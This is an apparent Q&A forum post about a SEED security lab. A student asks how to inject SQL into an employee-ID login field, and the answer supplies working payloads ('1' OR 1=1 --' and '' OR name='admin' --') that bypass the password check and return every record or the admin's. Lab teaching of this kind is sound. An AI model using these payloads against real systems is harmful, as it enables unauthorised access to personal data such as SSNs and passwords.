How to do sql injection in seed lab

Question

So I'm relatively new to SQL programming and we are asked in our lab to inject a statement into the employee ID field of a website based off the following code: I think the answer would be to just type 1=1 name = "admin" however this doesn't seem to work.

conn = getDB();
$sql = "SELECT id, name, eid, salary, birth, ssn,
phonenumber, address, email, nickname, Password
FROM credential
WHERE eid= ’$input_eid’ and password=’$input_pwd’";
$result = $conn->query($sql))
// The following is psuedo code
if(name==’admin’){
return All employees information.
} else if(name!=NULL){
return employee information.
} else {
authentication fails.
}

Answer 1

One way to inject SQL here would be to inject a condition that would always be true to the userId and comment out the condition dealing with the password.

E.g., consider the following:

$input_eid = "1' OR 1=1 --";
$input_pwd = "does not matter";

This should generate the following SQL:

SELECT id, name, eid, salary, birth, ssn,
phonenumber, address, email, nickname, Password
FROM credential
WHERE eid= '1' OR 1=1 -- and password='does not matter'

As you can see, this query would clearly return all the rows in the database, regardless of the password you're injecting.

EDIT:
As per the clarification of the requirements in the comment below, you can substitute the "OR 1=1" part with name='admin' to get the admin's details. Just make sure to start off with something that isn't a valid id so you don't get its details by mistake. E.g., consider the following:

$input_eid = " ' OR name='admin' --";
$input_pwd = "does not matter";

You'd get the following SQL, which will query the admin's details:

SELECT id, name, eid, salary, birth, ssn,
phonenumber, address, email, nickname, Password
FROM credential
WHERE eid= ' ' OR name='admin' --' and password='does not matter'